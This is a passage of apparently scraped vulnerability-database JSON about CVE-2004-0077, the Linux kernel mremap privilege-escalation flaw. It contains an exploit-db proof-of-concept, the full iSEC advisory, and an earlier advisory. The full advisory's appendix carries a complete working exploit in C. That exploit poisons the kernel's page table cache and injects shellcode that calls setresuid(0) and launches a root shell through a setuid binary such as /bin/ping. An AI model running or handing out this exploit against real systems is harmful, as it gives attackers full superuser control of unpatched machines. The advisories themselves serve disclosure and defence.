"2004-02-18T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - \"mremap\" Local Proof-of-Concept 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0077"], "modified": "2004-02-18T00:00:00", "id": "EDB-ID:154", "href": "https://www.exploit-db.com/exploits/154/", "sourceData": "/*\r\n * Proof-of-concept exploit code for do_mremap() #2\r\n *\r\n * Copyright (C) 2004 Christophe Devine\r\n *\r\n * This program is free software; you can redistribute it and/or modify\r\n * it under the terms of the GNU General Public License as published by\r\n * the Free Software Foundation; either version 2 of the License, or\r\n * (at your option) any later version.\r\n *\r\n * This program is distributed in the hope that it will be useful,\r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n * GNU General Public License for more details.\r\n *\r\n * You should have received a copy of the GNU General Public License\r\n * along with this program; if not, write to the Free Software\r\n * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\r\n */\r\n\r\n\r\n#include <asm/unistd.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <errno.h>\r\n\r\n\r\n#define MREMAP_MAYMOVE 1\r\n#define MREMAP_FIXED 2\r\n\r\n\r\n#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED\r\n\r\n\r\n#define __NR_real_mremap __NR_mremap\r\n\r\n\r\nstatic inline _syscall5( void *, real_mremap, void *, old_address,\r\n size_t, old_size, size_t, new_size,\r\n unsigned long, flags, void *, new_address );\r\n\r\n\r\n#define VMA_SIZE 0x00003000\r\n\r\n\r\nint main( void )\r\n{\r\n int i, ret;\r\n void *base0;\r\n void *base1;\r\n\r\n\r\n i = 0;\r\n\r\n\r\n while( 1 )\r\n {\r\n i++;\r\n\r\n\r\n ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),\r\n VMA_SIZE, PROT_READ | PROT_WRITE,\r\n MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );\r\n\r\n\r\n if( ret == -1 )\r\n {\r\n perror( \"mmap\" );\r\n break;\r\n }\r\n\r\n\r\n base0 = base1;\r\n base1 = (void *) ret;\r\n }\r\n\r\n\r\n printf( \"created ~%d VMAs\\n\", i );\r\n\r\n\r\n base0 += 0x1000;\r\n base1 += 0x1000;\r\n\r\n\r\n printf( \"now mremapping 0x%08X at 0x%08X\\n\",\r\n (int) base1, (int) base0 );\r\n\r\n\r\n real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );\r\n\r\n\r\n printf( \"kernel may not be vulnerable\\n\" );\r\n\r\n\r\n return( 0 );\r\n}\r\n\r\n\r\n// milw0rm.com [2004-02-18]\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/154/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "cvelist": ["CVE-2004-0077"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSynopsis: Linux kernel do_mremap VMA limit local privilege escalation\r\n vulnerability\r\nProduct: Linux kernel\r\nVersion: 2.2 up to and including 2.2.25, 2.4 up to to and including 2.4.24, \r\n 2.6 up to to and including 2.6.2\r\nVendor: http://www.kernel.org/\r\nURL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\r\nCVE: CAN-2004-0077\r\nAuthor: Paul Starzetz <ihaquer@isec.pl>\r\nDate: March 1, 2004\r\n\r\n\r\nIssue:\r\n======\r\n\r\nA critical security vulnerability has been found in the Linux kernel memory \r\nmanagement code inside the mremap(2) system call due to missing function return \r\nvalue check. This bug is completely unrelated to the mremap bug disclosed on \r\n05-01-2004 except concerning the same internal kernel function code.\r\n\r\n\r\nDetails:\r\n========\r\n\r\nThe Linux kernel manages a list of user addressable valid memory locations on a \r\nper process basis. Every process owns a single linked list of so called virtual \r\nmemory area descriptors (called from now on just VMAs). Every VMA describes the \r\nstart of a valid memory region, its length and moreover various memory flags \r\nlike page protection. \r\n\r\nEvery VMA in the list corresponds to a part of the process's page table. The \r\npage table contains descriptors (in short page table entries PTEs) of physical \r\nmemory pages seen by the process. The VMA descriptor can be thus understood as a \r\nhigh level description of a particular region of the process's page table \r\nstoring PTE properties like page R/W flag and so on.\r\n\r\nThe mremap() system call provides resizing (shrinking or growing) as well as \r\nmoving of existing virtual memory areas or any of its parts across process's \r\naddressable space.\r\n\r\nMoving a part of the virtual memory from inside a VMA area to a new location \r\nrequires creation of a new VMA descriptor as well as copying the underlying page \r\ntable entries described by the VMA from the old to the new location in the \r\nprocess's page table.\r\n\r\nTo accomplish this task the do_mremap code calls the do_munmap() internal kernel \r\nfunction to remove any potentially existing old memory mapping in the new \r\nlocation as well as to remove the old virtual memory mapping. Unfortunately the \r\ncode doesn't test the return value of the do_munmap() function which may fail if \r\nthe maximum number of available VMA descriptors has been exceeded. This happens \r\nif one tries to unmap middle part of an existing memory mapping and the \r\nprocess's limit on the number of VMAs has been reached (which is currently \r\n65535).\r\n\r\nOne of the possible situations can be illustrated with the following picture. \r\nThe corresponding page table entries (PTEs) have been marked with o and x:\r\n\r\nBefore mremap():\r\n\r\n(oooooooooooooooooooooooo) (xxxxxxxxxxxx)\r\n[----------VMA1----------] [----VMA2----]\r\n [REMAPPED-VMA] <---------------|\r\n\r\n\r\nAfter mremap() without VMA limit:\r\n\r\n(oooo)(xxxxxxxxxxxx)(oooo)\r\n[VMA3][REMAPPED-VMA][VMA4]\r\n\r\n\r\nAfter mremap() but VMA limit:\r\n\r\n(ooooxxxxxxxxxxxxxxoooo)\r\n[---------VMA1---------]\r\n [REMAPPED-VMA]\r\n\r\n\r\nAfter the maximum number of VMAs in the process's VMA list has been reached \r\ndo_munmap() will refuse to create the necessary VMA hole because it would split \r\nthe original VMA in two disjoint VMA areas exceeding the VMA descriptor limit.\r\n\r\nDue to the missing return value check after trying to unmap the middle of the \r\nVMA1 (this is the first invocation of do_munmap inside do_mremap code) the \r\ncorresponding page table entries from VMA2 are still inserted into the page \r\ntable location described by VMA1 thus being subject to VMA1 page protection \r\nflags. It must be also mentioned that the original PTEs in the VMA1 are lost \r\nthus leaving the corresponding page frames unusable for ever.\r\n\r\nThe kernel also tries to insert the overlapping VMA area into the VMA descriptor \r\nlist but this fails due to further checks in the low level VMA manipulation \r\ncode. The low level VMA list check in the 2.4 and 2.6 kernel versions just call \r\nBUG() therefore terminating the malicious process.\r\n\r\nThere are also two other unchecked calls to do_munmap() inside the do_mremap() \r\ncode and we believe that the second occurrence of unchecked do_munmap is also \r\nexploitable. The second occurrence takes place if the VMA to be remapped is \r\nbeeing truncated in place. Note that do_munmap can also fail on an exceptional \r\nlow memory condition while trying to allocate a VMA descriptor.\r\n\r\n\r\nExploitation:\r\n=============\r\n\r\nThe vulnerability turned out to be very easily exploitable. Our first guess was \r\nto move PTEs from one VMA mapping a read-only file (like /etc/passwd) to another \r\nwriteable VMA. This approach failed because after the BUG() macro has been \r\ninvoked the mmap semaphore of the memory descriptor is left in a closed (that is \r\ndown_write()) state thus preventing any further memory operations which acquire \r\nthe semaphore in other clone threads.\r\n\r\nSo our attention came over the page table cache code which was introduced early \r\nin the 2.4 series but not enabled by default. Kernels later than the 2.4.19 \r\nenable the page table cache. The basic idea of a page table cache is to keep \r\nfree page frames recently used for the page tables in a linked list to speed up \r\nthe allocation of new page tables.\r\n\r\nOn Linux every process owns a reference to a memory descriptor (mm_struct) which \r\ncontains a pointer to a page directory. The page directory is a single page \r\nframe (we describe the 4kb sized pages case without PAE) containing 1024 \r\npointers to the page tables. A single page table page on the i386 architecture \r\nholds 1024 PTEs describing up to 4MB of process's virtual memory. A single PTE \r\ncontains the physical address of the page mapped at the PTE's virtual address \r\nand the page access rights.\r\n\r\nThe page tables are allocated on demand if a page fault occurs. They are also \r\nfreed and the corresponding page frames released to the memory manager if a \r\nprocess unmaps parts of its virtual memory spanning at least one page table page \r\nthat is a region containing at least a 4MB sized and 4MB aligned memory area.\r\n\r\nThere are two paths if a new page table must be allocated: the slow and the fast \r\none. The fast path takes one page from the head of the page table cache while \r\nthe slow one just calls get_free_page(). This works well if the pages from the \r\npage table cache have been properly cleared before inserting them into the \r\ncache. Normally the page tables are cleared by zap_page_range() which is called \r\nfrom do_munmap. It is very important for the proper operation of the Linux \r\nmemory management that all locations of the process's page table actually \r\ncontaining a valid PTE are covered by the corresponding VMA descriptor.\r\n\r\nIn the case of the unchecked do_munmap inside the mremap code we have found a \r\ncondition leaving a part of the page table uncovered by a VMA. The offending \r\ncode is:\r\n\r\n[269] if (old_len >= new_len) {\r\n do_munmap(current->mm, addr+new_len, old_len - new_len);\r\n if (!(flags & MREMAP_FIXED) || (new_addr == addr))\r\n goto out;\r\n }\r\n\r\nThis piece of code is responsible for truncating the VMA the user wants to remap \r\nin place. It can be easily seen that do_munmap will fail if [addr+new_len, \r\naddr+new_len + (old_len-new_len)] goes into the middle of a VMA and the maximum \r\nnumber of allowed VMA descriptors has been already used by the process. That \r\nmeans also that the page table will still contain valid PTEs from addr+new_len \r\non. Later in the mremap code a part of the corresponding VMA is moved and \r\ntruncated:\r\n\r\n[179] if (!move_page_tables(current->mm, new_addr, addr, old_len)) {\r\n unsigned long vm_locked = vma->vm_flags & VM_LOCKED;\r\n\r\n if (allocated_vma) {\r\n *new_vma = *vma;\r\n new_vma->vm_start = new_addr;\r\n new_vma->vm_end = new_addr+new_len;\r\n new_vma->vm_pgoff += (addr-vma->vm_start) >> PAGE_SHIFT;\r\n\r\nbut more PTEs (namely old_len) than the length of the created VMA are moved from \r\nthe old location if a new location has been specified along with the \r\nMREMAP_MAYMOVE flag. This works well only if the previous do_munmap did not \r\nfail. This situation can be illustrated as follows:\r\n\r\nbefore mremap:\r\n\r\n <-- old_len -->\r\n(oooooooooooooooooooooooooooo)\r\n[------|-----VMA1-----|------]\r\n |---------------------------------> new_addr\r\n\r\n\r\nafter mremap, no VMA limit:\r\n new_len\r\n(oooooo) (oooooo) (oooooo)\r\n[-VMA1-] [-VMA3-] [-VMA2-]\r\n\r\n\r\nafter mremap but VMA limit:\r\n new_len [*]\r\n(oooooo oooooo) (oooooo)ooooooooo\r\n[-----------VMA1-------------] [-VMA2-]\r\n\r\n\r\nThose [*] 'ownerless' PTE entries in the page table can be further exploited \r\nsince the memory manager has lost track of them. If the process now unmaps a \r\nsufficiently big area of memory covering those ownerless PTEs, the underlying \r\npage table frame will be inserted into the page table cache but will still \r\ncontain valid PTEs. That means that on the next page table frame allocation \r\ninside process P for an address A our PTEs will appear in the page table of the \r\nprocess P! If that process tries to access the virtual memory at the address A \r\nthere won't be also a page fault if the PTEs have appropriate (read or write) \r\naccess rights. In other words: through the page table cache we are able to \r\ninsert any data into the virtual memory space of another process.\r\n\r\nOur code takes the way through a setuid binary, however this is not the only one \r\npossibility. We prepare the page table cache so that there is a single empty \r\npage frame in front of the cache and then a special page table containing 'self \r\nexecuting' pages. To fully understand how it works we must dig into the execve() \r\nsystem call.\r\n\r\nIf an user calls execve() the kernel removes all traces of the current \r\nexecutable including the virtual memory areas and page tables allocated to the \r\nprocess. Then a new VMA for the stack on top of the virtual memory is created \r\nwhere the program environment and arguments to the new binary are stored (they \r\nhave been preserved in kernel memory). This causes a first page table frame to \r\nbe allocated for the virtual memory region ranging from 0xbfc00000-0xc0000000.\r\n\r\nAs next the .text and .data sections of the binary to be executed as well as the \r\nprogram interpreter responsible for further loading are mapped into the fresh \r\nvirtual memory space. For the ELF linking format this is usually the ld.so \r\ndynamic linker. At this point the kernel does not allocate the underlying page \r\ntables. Only VMA descriptors are inserted into the process's VMA list.\r\n\r\nAfter doing some more work not important for the following the kernel transfers \r\ncontrol to the dynamic linker to execute the binary. This causes a second page \r\nfault and triggers demand loading of the first code page of the dynamic linker. \r\nOn a standard Linux kernel this will also allocate a page frame for the page \r\ntable ranging from 0x40000000 to 0x40400000.\r\n\r\nOn a kernel with page table cache enabled both allocations will take page frames \r\nfrom the cache first. That means that if the second page in the cached page list \r\ncontains valid PTEs those could appear instead of the regular dynamic linker \r\ncode. It is easy to place the PTEs so that they will shadow the code section of \r\nthe dynamic linker. Note that the first PTE entry of a page is used by the cache \r\ncode to maintain the page list. In our code we populate the page table cache \r\nwith special frames containing PTEs to pages with a short shell code at the end \r\nof the page and fill the pages with a NOP landing zone.\r\n\r\nWe must also mention that the first mremap hole disclosed on 05-01-2004 can be \r\nalso very easily exploited through the page table cache. Details are left for \r\nthe skilled reader. \r\n\r\nA second possibility to exploit the mremap bug is to create another VMA covering \r\nownerless PTEs from a read-only file like /etc/passwd.\r\n\r\n\r\nImpact:\r\n=======\r\n\r\nSince no special privileges are required to use the mremap(2) system call any \r\nprocess may use its unexpected behavior to disrupt the kernel memory management \r\nsubsystem.\r\n\r\nProper exploitation of this vulnerability leads to local privilege escalation \r\ngiving an attacker full super-user privileges. The vulnerability may also lead \r\nto a denial-of-service attack on the available system memory.\r\n\r\nTested and known to be vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 \r\nand <= 2.6.2. The 2.2.25 version of Linux kernel does not recognize the \r\nMREMAP_FIXED flag but this does not prevent the bug from being successfully \r\nexploited. All users are encouraged to patch all vulnerable systems as soon as \r\nappropriate vendor patches are released. There is no hotfix for this \r\nvulnerability. Limited per user virtual memory still permits do_munmap() to \r\nfail.\r\n\r\n\r\nCredits:\r\n========\r\n\r\nPaul Starzetz <ihaquer@isec.pl> has identified the vulnerability and performed \r\nfurther research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION \r\nPRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS.\r\n\r\n\r\nDisclaimer:\r\n===========\r\n\r\nThis document and all the information it contains are provided "as is", for \r\neducational purposes only, without warranty of any kind, whether express or \r\nimplied.\r\n\r\nThe authors reserve the right not to be responsible for the topicality, \r\ncorrectness, completeness or quality of the information provided in this \r\ndocument. Liability claims regarding damage caused by the use of any information \r\nprovided, including any kind of information which is incomplete or incorrect, \r\nwill therefore be rejected.\r\n\r\n\r\nAppendix:\r\n=========\r\n\r\n/*\r\n *\r\n * mremap missing do_munmap return check kernel exploit\r\n *\r\n * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte\r\n * ./mremap_pte [suid] [[shell]]\r\n *\r\n * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.\r\n *\r\n * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"\r\n * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION\r\n * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <syscall.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <sched.h>\r\n\r\n#include <sys/mman.h>\r\n#include <sys/wait.h>\r\n#include <sys/utsname.h>\r\n\r\n#include <asm/page.h>\r\n\r\n\r\n#define str(s) #s\r\n#define xstr(s) str(s)\r\n\r\n// this is for standard kernels with 3/1 split\r\n#define STARTADDR 0x40000000\r\n#define PGD_SIZE (PAGE_SIZE * 1024)\r\n#define VICTIM (STARTADDR + PGD_SIZE)\r\n#define MMAP_BASE (STARTADDR + 3*PGD_SIZE)\r\n\r\n#define DSIGNAL SIGCHLD\r\n#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)\r\n\r\n#define MREMAP_MAYMOVE ( (1UL) << 0 )\r\n#define MREMAP_FIXED ( (1UL) << 1 )\r\n\r\n#define __NR_sys_mremap __NR_mremap\r\n\r\n\r\n// how many ld.so pages? this is the .text section length (like cat \r\n// /proc/self/maps) in pages\r\n#define LINKERPAGES 0x14\r\n\r\n// suid victim\r\nstatic char *suid="/bin/ping";\r\n\r\n// shell to start\r\nstatic char *launch="/bin/bash";\r\n\r\n\r\n_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, \r\n ulong, e);\r\nunsigned long sys_mremap(unsigned long addr, unsigned long old_len, \r\n unsigned long new_len, unsigned long flags, \r\n unsigned long new_addr);\r\n\r\nstatic volatile unsigned base, *t, cnt, old_esp, prot, victim=0;\r\nstatic int i, pid=0;\r\nstatic char *env[2], *argv[2];\r\nstatic ulong ret;\r\n\r\n\r\n// code to appear inside the suid image\r\nstatic void suid_code(void)\r\n{\r\n__asm__(\r\n " call callme \n"\r\n\r\n// setresuid(0, 0, 0), setresgid(0, 0, 0)\r\n "jumpme: xorl %ebx, %ebx \n"\r\n " xorl %ecx, %ecx \n"\r\n " xorl %edx, %edx \n"\r\n " xorl %eax, %eax \n"\r\n " mov $"xstr(__NR_setresuid)", %al \n"\r\n " int $0x80 \n"\r\n " mov $"xstr(__NR_setresgid)", %al \n"\r\n " int $0x80 \n"\r\n\r\n// execve(launch)\r\n " popl %ebx \n"\r\n " andl $0xfffff000, %ebx \n"\r\n " xorl %eax, %eax \n"\r\n " pushl %eax \n"\r\n " movl %esp, %edx \n"\r\n " pushl %ebx \n"\r\n " movl %esp, %ecx \n"\r\n " mov $"xstr(__NR_execve)", %al \n"\r\n " int $0x80 \n"\r\n\r\n// exit\r\n " xorl %eax, %eax \n"\r\n " mov $"xstr(__NR_exit)", %al \n"\r\n " int $0x80 \n"\r\n\r\n "callme: jmp jumpme \n"\r\n );\r\n}\r\n\r\n\r\nstatic int suid_code_end(int v)\r\n{\r\nreturn v+1;\r\n}\r\n\r\n\r\nstatic inline void get_esp(void)\r\n{\r\n__asm__(\r\n " movl %%esp, %%eax \n"\r\n " andl $0xfffff000, %%eax \n"\r\n " movl %%eax, %0 \n"\r\n : : "m"(old_esp)\r\n );\r\n}\r\n\r\n\r\nstatic inline void cloneme(void)\r\n{\r\n__asm__(\r\n " pusha \n"\r\n " movl $("xstr(CLONEFL)"), %%ebx \n"\r\n " movl %%esp, %%ecx \n"\r\n " movl $"xstr(__NR_clone)", %%eax \n"\r\n " int $0x80 \n"\r\n " movl %%eax, %0 \n"\r\n " popa \n"\r\n : : "m"(pid)\r\n );\r\n}\r\n\r\n\r\nstatic inline void my_execve(void)\r\n{\r\n__asm__(\r\n " movl %1, %%ebx \n"\r\n " movl %2, %%ecx \n"\r\n " movl %3, %%edx \n"\r\n " movl $"xstr(__NR_execve)", %%eax \n"\r\n " int $0x80 \n"\r\n : "=a"(ret)\r\n : "m"(suid), "m"(argv), "m"(env)\r\n );\r\n}\r\n\r\n\r\nstatic inline void pte_populate(unsigned addr)\r\n{\r\nunsigned r;\r\nchar *ptr;\r\n\r\n memset((void*)addr, 0x90, PAGE_SIZE);\r\n r = ((unsigned)suid_code_end) - ((unsigned)suid_code);\r\n ptr = (void*) (addr + PAGE_SIZE);\r\n ptr -= r+1;\r\n memcpy(ptr, suid_code, r);\r\n memcpy((void*)addr, launch, strlen(launch)+1);\r\n}\r\n\r\n\r\n// hit VMA limit & populate PTEs\r\nstatic void exhaust(void)\r\n{\r\n// mmap PTE donor\r\n t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,\r\n MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n if(MAP_FAILED==t)\r\n goto failed;\r\n\r\n// prepare shell code pages\r\n for(i=2; i<LINKERPAGES+1; i++)\r\n pte_populate(victim + PAGE_SIZE*i);\r\n i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);\r\n if(i)\r\n goto failed;\r\n\r\n// lock unmap\r\n base = MMAP_BASE;\r\n cnt = 0;\r\n prot = PROT_READ;\r\n printf("\n"); fflush(stdout);\r\n for(;;) {\r\n t = mmap((void*)base, PAGE_SIZE, prot, \r\n MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n if(MAP_FAILED==t) {\r\n if(ENOMEM==errno)\r\n break;\r\n else\r\n goto failed;\r\n }\r\n if( !(cnt%512) || cnt>65520 )\r\n printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,\r\n base+PAGE_SIZE); fflush(stdout);\r\n base += PAGE_SIZE;\r\n prot ^= PROT_EXEC;\r\n cnt++;\r\n }\r\n\r\n// move PTEs & populate page table cache\r\n ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, \r\n MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);\r\n if(-1==ret)\r\n goto failed;\r\n\r\n munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);\r\n t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, \r\n PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, \r\n 0);\r\n if(MAP_FAILED==t)\r\n goto failed;\r\n\r\n *t = *((unsigned *)old_esp);\r\n munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));\r\n printf("\n[+] Success\n\n"); fflush(stdout);\r\n return;\r\n\r\nfailed:\r\n printf("\n[-] Failed\n"); fflush(stdout);\r\n _exit(0);\r\n}\r\n\r\n\r\nstatic inline void check_kver(void)\r\n{\r\nstatic struct utsname un;\r\nint a=0, b=0, c=0, v=0, e=0, n;\r\n\r\n uname(&un);\r\n n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);\r\n if(n!=3 || a!=2) {\r\n printf("\n[-] invalid kernel version string\n");\r\n _exit(0);\r\n }\r\n\r\n if(b==2) {\r\n if(c<=25)\r\n v=1;\r\n }\r\n else if(b==3) {\r\n if(c<=99)\r\n v=1;\r\n }\r\n else if(b==4) {\r\n if(c>18 && c<=24)\r\n v=1, e=1;\r\n else if(c>24)\r\n v=0, e=0;\r\n else\r\n v=1, e=0;\r\n }\r\n else if(b==5 && c<=75)\r\n v=1, e=1;\r\n else if(b==6 && c<=2)\r\n v=1, e=1;\r\n\r\n printf("\n[+] kernel %s vulnerable: %s exploitable %s",\r\n un.release, v? "YES" : "NO", e? "YES" : "NO" );\r\n fflush(stdout);\r\n\r\n if(v && e)\r\n return;\r\n _exit(0);\r\n}\r\n\r\n\r\nint main(int ac, char **av)\r\n{\r\n// prepare\r\n check_kver();\r\n memset(env, 0, sizeof(env));\r\n memset(argv, 0, sizeof(argv));\r\n if(ac>1) suid=av[1];\r\n if(ac>2) launch=av[2];\r\n argv[0] = suid;\r\n get_esp();\r\n\r\n// mmap & clone & execve\r\n exhaust();\r\n cloneme();\r\n if(!pid) {\r\n my_execve();\r\n } else {\r\n waitpid(pid, 0, 0);\r\n }\r\n\r\nreturn 0;\r\n}\r\n\r\n- -- \r\nPaul Starzetz\r\niSEC Security Research\r\nhttp://isec.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQFAQ3a/C+8U3Z5wpu4RAtOFAKCtT8EM9zn5n/maQlSwTZu2wkdHawCfYlht\r\nWdUJcKDwAzO44Dpmc9IqiEs=\r\n=mMKN\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2004-03-02T00:00:00", "published": "2004-03-02T00:00:00", "id": "SECURITYVULNS:DOC:5853", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5853", "title": "mremap(2) full details available", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "cvelist": ["CVE-2004-0077"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSynopsis: Linux kernel do_mremap VMA limit local privilege escalation\r\n vulnerability\r\nProduct: Linux kernel\r\nVersion: 2.2 up to 2.2.25, 2.4 up to 2.4.24, 2.6 up to 2.6.2\r\nVendor: http://www.kernel.org/\r\nURL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\r\nCVE: CAN-2004-0077\r\nAuthor: Paul Starzetz <ihaquer@isec.pl>\r\nDate: February 18, 2004\r\n\r\n\r\nIssue:\r\n======\r\n\r\nA critical security vulnerability has been found in the Linux kernel \r\nmemory management code inside the mremap(2) system call due to missing \r\nfunction return value check. This bug is completely unrelated to the \r\nmremap bug disclosed on 05-01-2004 except concerning the same internal \r\nkernel function code.\r\n\r\n\r\nDetails:\r\n========\r\n\r\nThe Linux kernel manages a list of user addressable valid memory \r\nlocations on a per process basis. Every process owns a single linked \r\nlist of so called virtual memory area descriptors (called from now on \r\njust VMAs). Every VMA describes the start of a valid memory region, its \r\nlength and moreover various memory flags like page protection. \r\n\r\nEvery VMA in the list corresponds to a part of the process's page table. \r\nThe page table contains descriptors (in short page table entries PTEs) \r\nof physical memory pages seen by the process. The VMA descriptor can be \r\nthus understood as a high level description of a particular region of \r\nthe process's page table storing PTE properties like page R/W flag and \r\nso on.\r\n\r\nThe mremap() system call provides resizing (shrinking or growing) as \r\nwell as moving of existing virtual memory areas or any of its parts \r\nacross process's addressable space.\r\n\r\nMoving a part of the virtual memory from inside a VMA area to a new \r\nlocation requires creation of a new VMA descriptor as well as copying \r\nthe underlying page table entries described by the VMA from the old to \r\nthe new location in the process's page table.\r\n\r\nTo accomplish this task the do_mremap code calls the do_munmap() \r\ninternal kernel function to remove any potentially existing old memory \r\nmapping in the new location as well as to remove the old virtual memory \r\nmapping. Unfortunately the code doesn't test the return value of the \r\ndo_munmap() function which may fail if the maximum number of available \r\nVMA descriptors has been exceeded. This happens if one tries to unmap \r\nmiddle part of an existing memory mapping and the process's limit on the \r\nnumber of VMAs has been reached (which is currently 65535).\r\n\r\nOne of the possible situations can be illustrated with the following \r\npicture. The corresponding page table entries (PTEs) have been marked \r\nwith o and x:\r\n\r\nBefore mremap():\r\n\r\n(oooooooooooooooooooooooo) (xxxxxxxxxxxx)\r\n[----------VMA1----------] [----VMA2----]\r\n [REMAPPED-VMA] <---------------|\r\n\r\n\r\nAfter mremap() without VMA limit:\r\n\r\n(oooo)(xxxxxxxxxxxx)(oooo)\r\n[VMA3][REMAPPED-VMA][VMA4]\r\n\r\n\r\nAfter mremap() but VMA limit:\r\n\r\n(ooooxxxxxxxxxxxxxxoooo)\r\n[---------VMA1---------]\r\n [REMAPPED-VMA]\r\n\r\n\r\nAfter the maximum number of VMAs in the process's VMA list has been \r\nreached do_munmap() will refuse to create the necessary VMA hole because \r\nit would split the original VMA in two disjoint VMA areas exceeding the \r\nVMA descriptor limit.\r\n\r\nDue to the missing return value check after trying to unmap the middle \r\nof the VMA1 (this is the first invocation of do_munmap inside do_mremap \r\ncode) the corresponding page table entries from VMA2 are still inserted \r\ninto the page table location described by VMA1 thus being subject to \r\nVMA1 page protection flags. It must be also mentioned that the original \r\nPTEs in the VMA1 are lost thus leaving the corresponding page frames \r\nunusable for ever.\r\n\r\nThe kernel also tries to insert the overlapping VMA area into the VMA \r\ndescriptor list but this fails due to further checks in the low level \r\nVMA manipulation code. The low level VMA list check in the 2.4 and 2.6 \r\nkernel versions just call BUG() therefore terminating the malicious \r\nprocess.\r\n\r\nThere are also two other unchecked calls to do_munmap() inside the \r\ndo_mremap() code and we believe that the second occurrence of unchecked \r\ndo_munmap is also exploitable. The second occurrence takes place if the \r\nVMA to be remapped is beeing truncated in place. Note that do_munmap can \r\nalso fail on an exceptional low memory condition while trying to \r\nallocate a VMA descriptor.\r\n\r\nWe were able to create a robust proof-of-concept exploit code giving \r\nfull super-user privileges on all vulnerable kernel versions. The \r\nexploit code will be released next week.\r\n\r\n\r\nImpact:\r\n=======\r\n\r\nSince no special privileges are required to use the mremap(2) system \r\ncall any process may use its unexpected behavior to disrupt the kernel \r\nmemory management subsystem.\r\n\r\nProper exploitation of this vulnerability leads to local privilege \r\nescalation giving an attacker full super-user privileges. The \r\nvulnerability may also lead to a denial-of-service attack on the \r\navailable system memory.\r\n\r\nTested and known to be vulnerable kernel versions are all <= 2.2.25, <= \r\n2.4.24 and <= 2.6.1. The 2.2.25 version of Linux kernel does not \r\nrecognize the MREMAP_FIXED flag but this does not prevent the bug from \r\nbeing successfully exploited. All users are encouraged to patch all \r\nvulnerable systems as soon as appropriate vendor patches are released. \r\nThere is no hotfix for this vulnerablity. Limited per user virtual \r\nmemory still permits do_munmap() to fail.\r\n\r\n\r\nCredits:\r\n========\r\n\r\nPaul Starzetz <ihaquer@isec.pl> has identified the vulnerability and \r\nperformed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF \r\nINFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF \r\nONE OF THE AUTHORS.\r\n\r\n\r\nDisclaimer:\r\n===========\r\n\r\nThis document and all the information it contains are provided "as is", \r\nfor educational purposes only, without warranty of any kind, whether \r\nexpress or implied.\r\n\r\nThe authors reserve the right not to be responsible for the topicality, \r\ncorrectness, completeness or quality of the information provided in \r\nthis document. Liability claims regarding damage caused by the use of \r\nany information provided, including any kind of information which is \r\nincomplete or incorrect, will therefore be rejected.\r\n\r\n- -- \r\nPaul Starzetz\r\niSEC Security Research\r\nhttp://isec.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 